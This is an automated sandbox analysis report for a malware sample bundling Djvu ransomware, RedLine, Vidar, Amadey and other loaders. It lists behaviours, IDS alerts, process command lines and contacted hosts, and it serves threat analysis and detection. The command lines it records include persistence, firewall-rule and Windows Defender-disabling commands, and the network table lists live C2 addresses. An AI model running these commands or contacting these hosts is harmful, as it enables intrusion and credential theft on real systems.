Analysis Overview
SHA256
fc3e5b6b9d97afe0e0ad865e5b625c20b2fbf65bef4c46213b9abf941798303d
Threat Level: Known bad
The file faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.7z was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Win32/Colibri Loader Activity M2
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
Djvu Ransomware
PrivateLoader
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Amadey CnC Check-In
Modifies visibility of hidden/system files in Explorer
Glupteba
Modifies visibility of file extensions in Explorer
Process spawned unexpected child process
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
RedLine Payload
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Amadey
Colibri Loader
suricata: ET MALWARE Win32/Colibri Loader Activity M3
suricata: ET MALWARE Win32/Colibri Loader Activity
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Generic gate .php GET with minimal headers
Detected Djvu ransomware
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
Vidar
Vidar Stealer
Blocklisted process makes network request
Downloads MZ/PE file
Modifies Windows Firewall
Executes dropped EXE
UPX packed file
Reads user/profile data of web browsers
Checks computer location settings
Reads local data of messenger clients
Uses the VBS compiler for execution
Reads user/profile data of local email clients
Checks BIOS information in registry
Loads dropped DLL
Modifies file permissions
Adds Run key to start application
Accesses 2FA software files, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Checks installed software on the system
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Detects Pyinstaller
Enumerates physical storage devices
Program crash
Modifies system certificate store
Script User-Agent
Suspicious use of UnmapMainImage
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Checks SCSI registry key(s)
Suspicious behavior: AddClipboardFormatListener
Runs ping.exe
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Enumerates processes with tasklist
Suspicious use of WriteProcessMemory
outlook_win_path
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Delays execution with timeout.exe
Suspicious behavior: MapViewOfSection
Suspicious use of SendNotifyMessage
Kills process with taskkill
Modifies registry class
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-07-05 10:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-07-05 10:59
Reported
2022-07-05 11:06
Platform
win7-20220414-en
Max time kernel
157s
Max time network
393s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
PrivateLoader
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2024 set thread context of 1440 | N/A | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = … | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc
C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
"C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe"
C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
"C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe"
C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
"C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe"
C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
"C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe"
C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
"C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe"
C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe
"C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe"
C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe
"C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe"
C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe
"C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe"
C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
"C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe"
C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
"C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -?
C:\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe
"C:\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe"
C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe
"C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe"
C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe
"C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe"
C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe
"C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe
"C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
C:\Users\Admin\Pictures\Adobe Films\LEhUV4Bu2jo02_gBtm4NyWn4.exe
"C:\Users\Admin\Pictures\Adobe Films\LEhUV4Bu2jo02_gBtm4NyWn4.exe"
C:\Users\Admin\Pictures\Adobe Films\ed8OaHBYObpsBB72qmS5fqYf.exe
"C:\Users\Admin\Pictures\Adobe Films\ed8OaHBYObpsBB72qmS5fqYf.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tal.exe.pif
Tal.exe.pif H
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220705110445.log C:\Windows\Logs\CBS\CbsPersist_20220705110445.cab
C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
"C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
"C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 193.233.185.125:80 | | tcp |
| US | 193.233.185.125:80 | | tcp |
| US | 193.233.185.125:80 | | tcp |
| US | 193.233.185.125:80 | | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | maper.info | udp |
| US | 8.8.8.8:53 | fdhjtnthdngnd.click | udp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 188.114.96.0:80 | fdhjtnthdngnd.click | tcp |
| US | 8.8.8.8:53 | fantadentalperu.com | udp |
| US | 8.8.8.8:53 | timetogof.at | udp |
| US | 8.8.8.8:53 | iranparsa-novin.com | udp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| KR | 211.119.84.112:80 | timetogof.at | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| RU | 185.106.93.10:80 | 185.106.93.10 | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| RU | 193.106.191.246:80 | 193.106.191.246 | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 2.56.57.65:80 | 2.56.57.65 | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| KR | 211.119.84.112:80 | timetogof.at | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| US | 188.114.96.0:443 | fdhjtnthdngnd.click | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| CA | 192.99.207.151:443 | fantadentalperu.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| NL | 104.110.191.201:80 | apps.identrust.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 5.255.255.77:443 | yandex.ru | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | checkip.amazonaws.com | udp |
| IE | 52.17.214.221:80 | checkip.amazonaws.com | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | cnSrufvjrfjAHpXtGtICmuqBsaZF.cnSrufvjrfjAHpXtGtICmuqBsaZF | udp |
| RU | 193.106.191.81:23196 | | tcp |
| UA | 194.36.177.84:19999 | | tcp |
| US | 8.8.8.8:53 | ushatamaiet.xyz | udp |
| LV | 94.140.112.166:80 | ushatamaiet.xyz | tcp |
| US | 8.8.8.8:53 | 4hmn.short.gy | udp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 8.8.8.8:53 | jollygiunco.com | udp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | mastodon.online | udp |
| FI | 95.216.4.252:443 | mastodon.online | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 172.67.75.172:443 | api.ip.sb | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.85.1.163:80 | www.microsoft.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| SC | 185.215.113.75:81 | | tcp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
| US | 172.67.75.172:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 4hmn.short.gy | udp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
